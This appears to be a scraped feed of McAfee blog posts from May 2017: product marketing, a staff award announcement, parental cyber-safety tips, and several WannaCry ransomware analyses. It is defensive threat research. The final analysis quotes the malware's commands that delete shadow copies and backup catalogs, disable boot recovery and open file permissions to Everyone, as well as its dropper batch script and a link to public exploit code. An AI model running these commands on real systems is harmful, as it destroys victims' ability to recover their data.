Stopping Ransomware in Its Tracks https://securingtomorrow.mcafee.com/business/stopping-ransomware-tracks/ https://securingtomorrow.mcafee.com/business/stopping-ransomware-tracks/#respond Mon, 15 May 2017 16:16:04 +0000 https://securingtomorrow.mcafee.com/?p=74060 At every partner visit I have, I hear about ransomware – the malware that makes our customers’ files unusable until they pay off the attacker. It’s everywhere, hitting large and small businesses with equal disruptions and damage. And customers are begging for help in keeping ransomware out of their endpoints and servers. Just how bad …

The post Stopping Ransomware in Its Tracks appeared first on McAfee Blogs.

]]>
At every partner visit I have, I hear about ransomware – the malware that makes our customers’ files unusable until they pay off the attacker. It’s everywhere, hitting large and small businesses with equal disruptions and damage. And customers are begging for help in keeping ransomware out of their endpoints and servers.

Just how bad is it? Ransomware is the “fastest growing malware threat, targeting users of all types – from the home user to the corporate network,” according to a recent U.S. government interagency report. An average of 4,000 ransomware attacks occurred daily in 2016, up a whopping 300 percent from the year before, the report states.

McAfee has the answer to this threat in Endpoint Security 10.5.

As I discussed in my previous blog, ENS 10.5 is McAfee’s most advanced endpoint security platform ever. It provides an array of detection, identification, and response capabilities, including machine-learning technology that quickly and efficiently spots ransomware and automatically shares detection intelligence with other endpoints. Speed is the means for thwarting ransomware attacks, and ENS 10.5 has it.

ENS 10.5 takes an even more vigorous and proactive approach to combatting ransomware. ENS 10.5 delivers multiple enhancements to McAfee Threat Intelligence, which has been renamed Adaptive Threat Protection to reflect the machine-learning technology underpinning it. These include the addition of new McAfee-defined queries for Real Protect and the Real Protect scanner, which inspects suspicious files and activities on an endpoint to detect malicious patterns using machine-learning techniques.

ENS 10.5 isn’t just about ransomware. The new product is a platform full of powerful threat prevention enhancements, including:

  • The ability to configure a Windows registry scan location for on-demand scans
  • The ability to create a custom Access Protection rule to protect Windows services
  • Management of Exploit Prevention signatures and Application Protection rules
  • The ability to display false-positive mitigation events using the Endpoint Security Threat Prevention: False Positive Mitigation Events query

Advanced malware and ransomware protection is critical today, but will become even more important over the next couple of years. We’re already seeing ransomware attack Internet of Things (IoT) devices as a means for getting into our customers’ networks. Soon, these attacks will prevent businesses from leveraging autonomous devices and cripple operations. Already, we’re seeing IoT devices being held for ransom in the power distribution and health care verticals.

Ransomware can turn a good day into a terrible one for a home user and a good month into a disaster for an enterprise. McAfee ENS 10.5 is built to detect and destroy zero-day malware to assure that customers’ days, weeks, months, and years are ransomware-free.

Our job is to help protect our mutual customers from the ransomware scourge. McAfee has a collection of information and resources for you to help guide customers through the migration from legacy products to ENS 10.5. Check out all of the ENS 10.5 sales, technical, and support resources available to you in the partner portal.

Together is Power!

The post Stopping Ransomware in Its Tracks appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/stopping-ransomware-tracks/feed/ 0
Congrats to our 2017 Women of the Channel https://securingtomorrow.mcafee.com/business/congrats-2017-women-channel/ https://securingtomorrow.mcafee.com/business/congrats-2017-women-channel/#respond Mon, 15 May 2017 14:00:38 +0000 https://securingtomorrow.mcafee.com/?p=73845 I’m proud to announce that CRN has recognized five McAfee women for their ability to create and elevate channel partner programs, develop fresh go-to-market strategies, strengthen the channel’s network of partnerships and build creative new IT solutions. As part of this recognition, Jimena Acevdeo, channel programs and enablement manager; Pamela Boich, director, worldwide channel operations; …

The post Congrats to our 2017 Women of the Channel appeared first on McAfee Blogs.

]]>
I’m proud to announce that CRN has recognized five McAfee women for their ability to create and elevate channel partner programs, develop fresh go-to-market strategies, strengthen the channel’s network of partnerships and build creative new IT solutions. As part of this recognition, Jimena Acevdeo, channel programs and enablement manager; Pamela Boich, director, worldwide channel operations; Allison Clarke, director of global partner programs and enablement; Regan Ogner, senior director of global distribution sales; and Natalie Tomlin, director of channel sales, have been named to CRN’s prestigious 2017 Women of the Channel list.  Natalie Tomlin has also been named to the 2017 Power 100, an elite subset of its prestigious annual Women of the Channel list.

The executives who comprise this annual list span the IT channel, representing vendors, distributors, solution providers and other organizations that figure prominently in the channel ecosystem. Each is recognized for her outstanding leadership, vision and unique role in driving channel growth and innovation within their respective companies.

CRN editors select the Women of the Channel honorees based on their professional accomplishments, demonstrated expertise and ongoing dedication to the IT channel. The Power 100 belong to an exclusive group drawn from a larger list of women leaders whose vision and influence are key drivers of their companies’ success and help move the entire IT channel forward.

The 2017 Women of the Channel list is featured in the June issue of CRN Magazine and online at www.CRN.com/wotc.

Congrats again to these amazing women!

Jimena Acevdeo

 

Pamela Boich

 

Allison Clarke

 

Regan Ogner

 

Natalie Tomlin

The post Congrats to our 2017 Women of the Channel appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/congrats-2017-women-channel/feed/ 0
Privacy Awareness Week 2017: It’s Time To Talk More To Your Kids https://securingtomorrow.mcafee.com/consumer/family-safety/its-time-to-talk-more-to-your-kids/ https://securingtomorrow.mcafee.com/consumer/family-safety/its-time-to-talk-more-to-your-kids/#respond Mon, 15 May 2017 00:40:51 +0000 https://securingtomorrow.mcafee.com/?p=73838 Attention, parents with kids between 8 and 17! Here’s a statistic that is probably going to make you squirm – apologies in advance. Conversations between Aussie parents and their kids about cyber safety have dropped an alarming 23% compared to previous years. Eeeekkk! This startling statistic is part of research conducted by McAfee and Life …

The post Privacy Awareness Week 2017: It’s Time To Talk More To Your Kids appeared first on McAfee Blogs.

]]>
Attention, parents with kids between 8 and 17! Here’s a statistic that is probably going to make you squirm – apologies in advance. Conversations between Aussie parents and their kids about cyber safety have dropped an alarming 23% compared to previous years. Eeeekkk! This startling statistic is part of research conducted by McAfee and Life Education to mark the start of Privacy Awareness Week in Australia.

Let’s Look At The Key Stats

The research, entitled ‘Trust and Transparency in Australian Family Households‘, surveyed over 1,000 Aussie adults and kids to gather insights on the online behaviour of both adults and kids. And the results are NOT great. We have taken our eye off the ball, parents, and we need to fix it ASAP!!! Here’s why:

  • Compared to previous years, conversations with our kids about online safety are down a whopping 23%!!
  • 41% of Aussie kids admit to hiding their online activity from their parents – and increase from 37% in previous years.
  • Our teens are using unreliable factors to determine how trustworthy apps and websites are, which has implications for their privacy. 83% of kids consider a site to be safe if ‘friends are using it’ while only 17% bother to check out the Terms & Conditions before they decide if they sign up.

We also need to take a good look at ourselves – the evidence is clear:

  • 2 out of 3 parents (66%) share their password with someone else.
  • 23% of parents do not have any restrictions in place to stop their children purchasing apps or making in-app purchases.
  • 41% of parents follow their kids on social media, compared with 66% in previous years.
  • Conversations about key online issues are down. In previous years 84% of us spoke to our kids about cyber bullying, whereas only 69% of us are doing so now.
McAfee Australia Privacy Awareness Week Infographic
For more on our survey visit www.mcafee-paw17.com.au

What Does This Mean For Us?

Many experts would agree that our generation is subject to challenges and pressures that previous generations never had to face. Whether it’s the constantly increasing cost of living and housing, the consequent work/family juggle to pay the bills, and of course the internet – we have lots on our plate. Many of us feel overwhelmed and time poor and that’s perfectly understandable.

However, we need to prioritise our children’s safety and that means upping the ante when it comes to teaching online safety. Schools do play a role here, but as parents it is our responsibility to ensure our kids are informed about the risks and pitfalls of the internet, and understand how to navigate this digital world while keeping their digital reputation and privacy intact.

Suggested Next Steps

So, here’s five things you can do this week in your home to get cyber safety back on the agenda:

Discuss Scams

  • At dinner time, talk about some of the recent scams that have been in the news. The Australian government’s Scamwatch website is a good source, as are reputable news sites.
  • For conversations this week, you could focus on the Can You Hear Me? phone scam or the Internet Pop-Up Scams that allow hackers remote access to your computer and have cost Aussies more than $41,000 so far this year.

Audit Privacy Settings

  • Have your kids check all their social media accounts to ensure they are set to ‘private’ so only their true friends can see their private information.
  • Each social media platform will have its own Help page which provides specific steps on how to do this.

Password Audit

  • Strong and complex passwords are essential to keeping your online information tight.
  • Ideally a password should have at least 8-10 characters and be a combination of letters – upper and lower case – numbers, and symbols.
  • Each online account should have its own password, too – which is a very overwhelming concept!
  • Consider using a password manager like the True Key app to help generate and manage all your passwords.

Ensure Your Kids Have A Plan If They Encounter Cyber Bullying

  • It is essential your kids know what to do if they either experience or witness cyber bullying.
  • Taking a screenshot is the absolute first course of action.
  • It is important that they don’t engage with the bully as that ‘feeds’ the bully’s sense of power.
  • Reporting the incident is the next step – to a parent, teacher, trusted adult friend, or even the police.

Protect Your – And Your Children’s – Digital Life

  • Comprehensive security software is an easy way to ensure your online life – and your children’s – is as secure as possible.
  • Not only will it guard you against viruses and threats, direct you away from risky websites and dangerous downloads, and protect your smartphones and tablets, it can also back up your important files.
  • McAfee Total Protection software comes with a 100% guarantee to protect you against viruses.

I know it all might seem like a lot of work, but teaching your kids about online privacy and safety needs to be a top priority for us all. Let’s get the statistics back under control and get those cyber safety discussions happening again. And make sure you’ve got something delicious planned for dinner because it’s the absolute best time to have these conversations!

Till next time!

Alex

PS: Better still, why not order pizza? It’s often cheaper online!

The post Privacy Awareness Week 2017: It’s Time To Talk More To Your Kids appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/its-time-to-talk-more-to-your-kids/feed/ 0
Further Analysis of WannaCry Ransomware https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/ https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/#respond Sun, 14 May 2017 21:25:15 +0000 https://securingtomorrow.mcafee.com/?p=74016 McAfee Labs has closely monitored the activity around the ransomware WannaCry. Many sources have reported on this attack and its behavior, including this post by McAfee’s Raj Samani and Christiaan Beek and this post by Steve Grobman. In the last 24 hours, we have learned more about this malware. These findings mainly concern the malware’s …

The post Further Analysis of WannaCry Ransomware appeared first on McAfee Blogs.

]]>
McAfee Labs has closely monitored the activity around the ransomware WannaCry. Many sources have reported on this attack and its behavior, including this post by McAfee’s Raj Samani and Christiaan Beek and this post by Steve Grobman. In the last 24 hours, we have learned more about this malware. These findings mainly concern the malware’s network propagation, Bitcoin activity, and differences in observed variants.

Malware network behavior

WannaCry uses the MS17-010 exploit to spread to other machines through NetBIOS. The malware contains exploits in its body that are used during the exploitation phase. These are related to CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, and CVE-2017-0148, all based on the MS17-10 security bulletin.

In many reports we read that the malware generates a list of internal IPs. We found that the malware generates random IP addresses, not limited to the local network. The following is an example attempt at propagation:

With this, the malware can spread not only to other machines in same network, but also across the Internet if sites allow NetBIOS packets from outside networks. This could be one reason for the widespread infection seen in this outbreak and why many people are unsure about the initial infection vector of the malware.

Another interesting characteristic of the malware is that once a machine with an open NetBIOS port is found, the malware will send three NetBIOS session setup packets to it. One has the proper IP of the machine being exploited, and the other two contain two IP addresses hardcoded in the malware body:

The preceding packet contains the IP of the machine being exploited. It uses the test network 192.168.0.0/24. The other two packets, below, contain different IPs that the malware has in its code:

This activity and the presence of two hardcoded IP addresses (192.168.56.20, 172.16.99.5) could be used to detect the exploit using network intrusion prevention systems.

Server message block (SMB) packets also contain the encrypted payload, which consists of exploit shellcode and the file launcher.dll. During our analysis, we found the malware is encrypted using a 4-byte XOR key, 0x45BF6313.

Encrypted payload with the key 0x45BF6313.

Decrypted launcher.dll payload.

We also found following x64 shellcode being transferred during network communication over SMB.

EternalBlue code.

DoublePulsar code.

Worm behavior

Machine A at left, Machine B at right. 

The infection flow to the vulnerable host (Machine B).

Kernel mode at left, user mode at right.

 

Infection using kernel exploit

In our analysis, we found that on infected machines the SMB driver srv2.sys is vulnerable in kernel module and is exploited by the malware to spread using SMB communication.

A compromised srv2.sys will inject launcher.dll into the user-mode process lsass.exe, which acts as the loader for mssecsvc.exe. This DLL contains only one export, PlayGame:

The code simply extracts the ransomware dropper from the resource shown previously, and starts it using the function CreateProcess:

 

Injected launcher.dll in the lsass.exe address space.

Malware variants in the wild

As reported by several sources, the malware dropper contains code to check to two specific domains before executing its ransomware or the network exploit codes.

  • hxxp://www[dot]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com
  • hxxp://www[dot]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com

While looking for more samples in our malware database, we came across several other droppers (MD5: 509C41EC97BB81B0567B059AA2F50FE8) that did not exhibit this same behavior. These other droppers did not have the code to exploit machines through NetBIOS or to check for the kill-switch domain. With these samples, the ransomware code would be executed in all cases.

These samples were found in the wild, which means they are capable of infecting and spreading, but in a much less aggressive way. Once the ransomware infects a machine, it also tries to infect any network shares mounted as local disks. Anyone accessing these shares could execute the malware sample by mistake and infect themselves. This infection vector is not as effective as the network exploit but could nonetheless wreak havoc in a corporate environment.

We also examined the droppers (for example, MD5: DB349B97C37D22F5EA1D1841E3C89EB4) that had the exploit code to compare with the other samples. We found that this exploit-aware dropper is a wrapper around the other droppers.

Looking at the exploit-aware sample, we found that one of the resources contains a 3.4MB .exe file that is the same as the other type of droppers:

The preceding resource is extracted after the remote host is exploited and sent to the victim and installed as a service. This event starts the infection on the remote machine.

File decryption

WannaCry offers free decryption for some random number of files in the folder C:\Intel\<random folder name>\f.wnry. We have seen 10 files decrypted for free.

In the first step, the malware checks the header of each encrypted file. Once successful, it calls the decryption routine, and decrypts all the files listed in C:\Intel\<random folder name>\ f.wnry.

A code snippet of the header check:

The format of the encrypted file:

To decrypt all the files on an infected machine we need the file 00000000.dky, which contains the decryption keys. The decryption routine for the key and original file follows:

Bitcoin activity

WannaCry uses three Bitcoin wallets to receive payments from its victims. Looking at the payment activity for these wallets gives us an idea of how much money the attackers have made.

The current statistics as of May 13 show that not many people have paid to recover their files:

  • Wallet 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
  • Wallet 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
  • Wallet 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

The attackers appear to have earned a little over BTC 15.44 (US$27,724.22). That is not much considering the number of infected machines, but these numbers are increasing and might become much higher in the next few days. It’s possible that the sink holing of two sites may have helped slow things down:

  • hxxp://www[dot]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com
  • hxxp://www[dot]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com

Multiple organizations across more than 90 countries have been impacted, according to reports.

We will update this blog as we learn more.

The post Further Analysis of WannaCry Ransomware appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/feed/ 0
WannaCry: The Old Worms and the New https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-old-worms-new/ https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-old-worms-new/#comments Sat, 13 May 2017 05:42:14 +0000 https://securingtomorrow.mcafee.com/?p=73980 The morning of Friday, May 12 multiple sources in Spain began reporting an outbreak of the ransomware now identified as WannaCry. Upon learning of these incidents, McAfee immediately began working to analyze samples of the ransomware and develop mitigation guidance and detection updates for its customers. By Friday afternoon, McAfee’s Global Threat Intelligence system was …

The post WannaCry: The Old Worms and the New appeared first on McAfee Blogs.

]]>
The morning of Friday, May 12 multiple sources in Spain began reporting an outbreak of the ransomware now identified as WannaCry.

Upon learning of these incidents, McAfee immediately began working to analyze samples of the ransomware and develop mitigation guidance and detection updates for its customers.

By Friday afternoon, McAfee’s Global Threat Intelligence system was updated to identify all known WannaCry samples and the company had delivered DAT signature updates to all its customers.

McAfee urges all its customers to ensure these DAT updates have been applied, and furthermore ensure that security updates are applied for all the software solutions they use. For more information, read this Knowledge Center article.

This week’s attacks leveraging the WannaCry ransomware were the first time we’ve seen an attack combine worm tactics along with the business model of ransomware. The weaponization of the Eternal Blue exploit made public weeks ago, and unpatched MS-17-010 Windows OS vulnerabilities by the thousands enabled WannaCry to infect hundreds of thousands of computers, across industries, across continents, and within just a day. Furthermore, these attacks accomplished all this with little or no human involvement, as is typically the case in other ransomware campaigns.

A hybrid of the proven, less the human

WannaCry’s success comes down to its ability to amplify one attack through the vulnerabilities of many machines on the network. The impact of the attack is much greater than what we’ve seen from traditional data ransomware attacks.

Almost all of the ransomware we see in the wild today attack individual users typically through spear-phishing, meaning victims receive an email that appears to be coming from a legitimate source, it lures the victim into clicking on a link or opening an attachment that downloads or executes malicious code on his or her system. But it only impacts that victim’s one computer.

If you think back to the late 90s and early 2000s, when we had Code Red, NIMDA and SQL Slammer, those worms spread really rapidly because they didn’t require a human to take any action in order to activate the malware on the machine.  This week’s attacks did something very similar.

We’re still working to determine how a “patient zero” machine became infected, but, once it was, if other machines hadn’t received the MS-17-010 vulnerability patch, they were infected over their network.

Instead of stealing data or damaging other machines, the malware executed a classic ransomware attack, encrypting files and demanding a ransom payment. The attack essentially combined two techniques to produce something that was highly impactful.

With WannaCry, if the configuration of machines within an organization possessed the Microsoft vulnerability (addressed by Microsoft in March), the ransomware could infect one machine and then move very rapidly to spread and impact many other machines that still had not been patched.

What we’ve typically seen with cybercrime is that when any technique is shown to be effective, there are almost always copycats. Given that this appears to have been quite an effective attack, it would be very reasonable for other attackers to look for other opportunities. One of the things that makes that difficult is you need to have a vulnerability in software that has characteristics that enable worm-like behavior.

What’s unique here is that there is a critical vulnerability that Microsoft has patched, and an active exploit that ended up in the public domain, both which created the opportunity and blueprint for the attacker to be able to create this type of malicious ransomware worm capability.

Open for exploit

In the late 90s, it was common practice to leave all sorts of software running on machines even if it wasn’t used. For instance, one of the worms in the 90s took advantage of a vulnerability in a print server which was by default included on all servers even if there wasn’t a printer attached to the configuration of systems. That could enable a worm to connect to that printer port on all of the servers on a network, creating a worm propagation scenario that infected system after system.

A common practice for addressing this since those days is a best practice known as “least privilege,” which allows an application or service to run only the things on a machine or network that that entity needs to complete a task or function specific to its particular role. Least privilege has reduced the chances of the traditional worm scenario, but unpatched vulnerabilities mimmick this “open” element available for exploit, particularly if such vulnerabilities enable things such as file transfer or sharing across systems.

It would be difficult to orchestrate attacks such as the WannaCry campaign, without all the unpatched vulnerabilities, the publicly released exploit, and a set of proven ransomware technologies and tactics at the attacker’s disposal.

To patch or to not to patch

WannaCry should remind IT of the criticality to apply patches quickly. Part of the reason IT organizations hesitate to patch or run an internal quality assurance process is to ensure that there aren’t software incompatibility issues. One way I like to think about this is that whenever a patch must be applied, there is a risk to applying a patch, and a risk to not applying a patch. Part of what IT managers need to understand and assess is what those two risks mean to their organizations.

By delaying deployment of a patch, they can mitigate risk related to application compatibility. By delaying a patch, they are increasing the risk of being compromised by a threat exploiting a vulnerability. IT teams need to understand for each patch, what those levels of risk are, and then make a decision that minimizes risk for an organization.

Events such as WannaCry have the potential to shift the calculus of this analysis. One of the problems we often see in security is that the lack of an attack is sometimes interpreted as having a good defense.  Companies that have become lax in applying patches may have not experienced any attacks that take advantage of those vulnerabilities. This can reinforce the behavior that it’s okay to delay patching.

This episode should remind organizations that they really do need an aggressive patching plan in order to mitigate the vulnerabilities in their environment.

Why the hospitals?

Hospitals fall into a category I think of as “soft targets,” meaning hospitals generally focus on patient care as their top priority, as opposed to having the best cyber defenders on staff and best cyber defense technologies in place.

The reason for this is that, traditionally, there was very little incentive for cybercriminals to attack a hospital. They could potentially steal patient records or other data, but the total value of data from a hospital would typically be less than that of  the bulk data stolen from other industries such as financial services.

What ransomware has done as a criminal business model is provide an incentive to attack any organization. Given that criminals are demanding a ransom, it’s far easier to exploit an organization with weaker cyber defenses than an organization with stronger cyber defenses, which is why we’ve seen hospitals, schools, municipal police departments, and universities become victims of ransomware over the last year. While we’re now starting to see the targeting of “harder” organizations as well, at least for now, there are a lot of opportunities for criminals to continue to target these soft target organizations.

What next?

Although this attack is something new, and something we need to be thoughtful of, when we see such a vulnerability occur in the wild, and an exploit published that could be used by cybercriminals, we should always expect and be prepared for this kind of attack, and many more copy-cat attacks following soon after.

 

For French translation click here.

For German translation click here.

The post WannaCry: The Old Worms and the New appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-old-worms-new/feed/ 2
“WannaCry” Ransomware Spreads Like Wildfire, Attacks Over 150 Countries https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wannacry-ransomware-attacks/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wannacry-ransomware-attacks/#comments Sat, 13 May 2017 00:32:14 +0000 https://securingtomorrow.mcafee.com/?p=73966 Update: The McAfee team has developed a tool that can be used in an effort to recover files that have been attacked by WannaCry ransomware. Learn about it here. Recently, a ransomware attack emerged that is worthy of tears. WannaCry ransomware hit the scene, spreading like wildfire across 150 countries and infecting more than 250,000 machines, which includes a …

The post “WannaCry” Ransomware Spreads Like Wildfire, Attacks Over 150 Countries appeared first on McAfee Blogs.

]]>
Update: The McAfee team has developed a tool that can be used in an effort to recover files that have been attacked by WannaCry ransomware. Learn about it here.

Recently, a ransomware attack emerged that is worthy of tears. WannaCry ransomware hit the scene, spreading like wildfire across 150 countries and infecting more than 250,000 machines, which includes a massive takedown of 16 UK NHS medical centers in just one day. Other major countries impacted include Spain, Russia, Ukraine, India, China, Italy, and Egypt.

Now, how is this massive attack possible? Our experts say the ransomware attack exploits the Server Message Block (SMB) critical vulnerability–also known as the Equation Group’s ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers a couple of weeks ago. Basically, the attacker can use just one exploit to gain remote access into a system. Once access is gained, the cybercriminal then encrypts data with a file extension “.WCRY.” Not to mention, the decypter tool used can hit users in multiple countries at once, and translate its ransom note to the appropriate language for that country. The ransom is said to demand $300 to decrypt the files.

The good news is, consumers don’t have to worry about this attack affecting their personal data, as it leverages a flaw within the way organizations’ networks allow devices to talk to each other.

Furthermore, by Friday afternoon, McAfee delivered detection updates to its products to ensure customers would be protected from all the known versions of the WannaCry ransomware.

However, this attack does act as a reminder for consumers to prepare for personal ransomware attacks. In order to stay prepared and keep your personal data secure, follow these tips:

-Be careful what you click on. This malware was distributed by phishing emails. You should only click on emails that you are sure came from a trusted source. Click here to learn more about phishing emails. 

-Back up your files. Always make sure your files are backed up. That way, if they become compromised in a ransomware attack, you can wipe your disk drive clean and restore the data from the backup.

-Update your devices. There are a few lessons to take away from WannaCry, but making sure your operating system is up-to-date needs to be near the top of the list. The reason is simple: nearly every software update contains security improvements that help secure your computer and removes the means for ransomware variants to infect a device.

Schedule automatic updates. It’s always a good practice to set your home systems to apply critical Windows Security Updates automatically. That way, whenever there is a vulnerability, you receive the patch immediately.

Apply any Windows security patches that Microsoft has sent you. If you are using an older version of Microsoft’s operating systems, such as Windows XP or Windows 8, click here to download emergency security patches from Microsoft. 

Keep security solutions up-to-date. Many security products are automatically updated. Take McAfee for example– our customers will be protected from this ransomware as soon they connect to the Internet and update their security software. Plus, as new variants of this ransomware arise, we will continuously update our software to keep them protected.

If you are not currently a McAfee customer, you can get protection here. And stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post “WannaCry” Ransomware Spreads Like Wildfire, Attacks Over 150 Countries appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wannacry-ransomware-attacks/feed/ 9
An Analysis of the WannaCry Ransomware Outbreak https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/ https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/#comments Fri, 12 May 2017 22:07:01 +0000 https://securingtomorrow.mcafee.com/?p=73946 Charles McFarland was a coauthor of this blog. Over the course of Friday, May 12 we received multiple reports of organizations across multiple verticals being victim to a ransomware attack. By Friday afternoon, McAfee’s Global Threat Intelligence system was updated to identify all known WannaCry samples and the company had delivered DAT signature updates to …

The post An Analysis of the WannaCry Ransomware Outbreak appeared first on McAfee Blogs.

]]>
Charles McFarland was a coauthor of this blog.

Over the course of Friday, May 12 we received multiple reports of organizations across multiple verticals being victim to a ransomware attack. By Friday afternoon, McAfee’s Global Threat Intelligence system was updated to identify all known WannaCry samples and the company had delivered DAT signature updates to all its customers. But the wave of attacks ranks as one of the more notable cyber events in history.

Once infected, the encrypted files contain the file extension .WNCRYT. Victims’ computers then proceed to display the following message with a demand for $300 to decrypt the files.

Observations

Exploit MS17-010:

The malware is using the MS17-010 exploit to distribute itself. This is a SMB vulnerability with remote code execution options. Details at https://technet.microsoft.com/en-us/library/security/ms17-010.aspx . Exploit code is available on multiple sites, including this example: https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb.

This exploit is also known as the Equation Group’s ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers a couple of weeks ago.

With MS17-010, the attacker can use just one exploit to get remote access with system privileges, meaning both steps (Remote Code Execution +Local Privilege Escalation combined) use just one bug in the SMB protocol. Analyzing the exploit code in Metasploit, a popular hacking tool, we see the exploit uses KI_USER_SHARED_DATA, which has a fixed memory address (0xffdff000 on 32-bit Windows) to copy the payload and transfer control to it later.

By remotely gaining control over a victim’s PC with system privileges without any user action, the attacker can spray this malware in the local network by having control over one system inside this network (gaining control over all systems that are not fixed and are affected by this vulnerability), and that one system will spread the ransomware to all vulnerable Windows systems not patched for MS17-010.

Behavior

By using command-line commands, the Volume Shadow copies and backups are removed:

Cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

File size of the ransomware is 3.4MB (3514368 bytes).

Authors called the ransomware WANNACRY—the string hardcoded in samples.

Ransomware is writing itself into a random character folder in the ProgramData folder with the filename tasksche.exe or in the C:\Windows\ folder with the filename mssecsvc.exe and tasksche.exe.

Examples

C:\ProgramData\lygekvkj256\tasksche.exe

C:\ProgramData\pepauehfflzjjtl340\tasksche.exe

C:\ProgramData\utehtftufqpkr106\tasksche.exe

c:\programdata\yeznwdibwunjq522\tasksche.exe

C:\ProgramData\uvlozcijuhd698\tasksche.exe

C:\ProgramData\pjnkzipwuf715\tasksche.exe

C:\ProgramData\qjrtialad472\tasksche.exe

c:\programdata\cpmliyxlejnh908\tasksche.exe

 

The ransomware grants full access to all files by using the command:

Icacls . /grant Everyone:F /T /C /Q

 

Using a batch script for operations:

176641494574290.bat 

 

Content of batch file (fefe6b30d0819f1a1775e14730a10e0e)

echo off

echo SET ow = WScript.CreateObject(“WScript.Shell”)> m.vbs

echo SET om = ow.CreateShortcut(“C:\

WanaDecryptor

.exe.lnk”)>> m.vbs

echo om.TargetPath = “C:\

WanaDecryptor

.exe”>> m.vbs

echo om.Save>> m.vbs

cscript.exe //nologo m.vbs

del m.vbs

del /a %0

Content of M.vbs

SET ow = WScript.CreateObject(“WScript.Shell”)

SET om = ow.CreateShortcut(“C:\

WanaDecryptor

.exe.lnk”)

om.TargetPath = “C:\

WanaDecryptor

om.Save

 

Indicators of compromise

Hashes

dff26a9a44baa3ce109b8df41ae0a301d9e4a28ad7bd7721bbb7ccd137bfd696

201f42080e1c989774d05d5b127a8cd4b4781f1956b78df7c01112436c89b2c9

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9

09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa

b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

aae9536875784fe6e55357900519f97fee0a56d6780860779a36f06765243d56

21ed253b796f63b9e95b4e426a82303dfac5bf8062bfe669995bde2208b360fd

2372862afaa8e8720bc46f93cb27a9b12646a7cbc952cc732b8f5df7aebb2450

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85

4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

4b76e54de0243274f97430b26624c44694fbde3289ed81a160e0754ab9f56f32

9cc32c94ce7dc6e48f86704625b6cdc0fda0d2cd7ad769e4d0bb1776903e5a13

78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

5d26835be2cf4f08f2beeff301c06d05035d0a9ec3afacc71dff22813595c0b9

76a3666ce9119295104bb69ee7af3f2845d23f40ba48ace7987f79b06312bbdf

fc626fe1e0f4d77b34851a8c60cdd11172472da3b9325bfe288ac8342f6c710a

eeb9cd6a1c4b3949b2ff3134a77d6736b35977f951b9c7c911483b5caeb1c1fb

043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2

57c12d8573d2f3883a8a0ba14e3eec02ac1c61dee6b675b6c0d16e221c3777f4

ca29de1dc8817868c93e54b09f557fe14e40083c0955294df5bd91f52ba469c8

f7c7b5e4b051ea5bd0017803f40af13bed224c4b0fd60b890b6784df5bd63494

3e6de9e2baacf930949647c399818e7a2caea2626df6a468407854aaa515eed9

9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640

5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

12d67c587e114d8dde56324741a8f04fb50cc3160653769b8015bc5aec64d20b

85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186

3f3a9dde96ec4107f67b0559b4e95f5f1bca1ec6cb204bfe5fea0230845e8301

 

IP Addresses

  • 197.231.221.221:9001
  • 128.31.0.39:9191
  • 149.202.160.69:9001
  • 46.101.166.19:9090
  • 91.121.65.179:9001
  • 2.3.69.209:9001
  • 146.0.32.144:9001
  • 50.7.161.218:9001
  • 217.79.179.177:9001
  • 213.61.66.116:9003
  • 212.47.232.237:9001
  • 81.30.158.223:9001
  • 79.172.193.32:443
  • 38.229.72.16:443

Domains

  • iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com (sinkholed)
  • Rphjmrpwmfv6v2e[dot]onion
  • Gx7ekbenv2riucmf[dot]onion
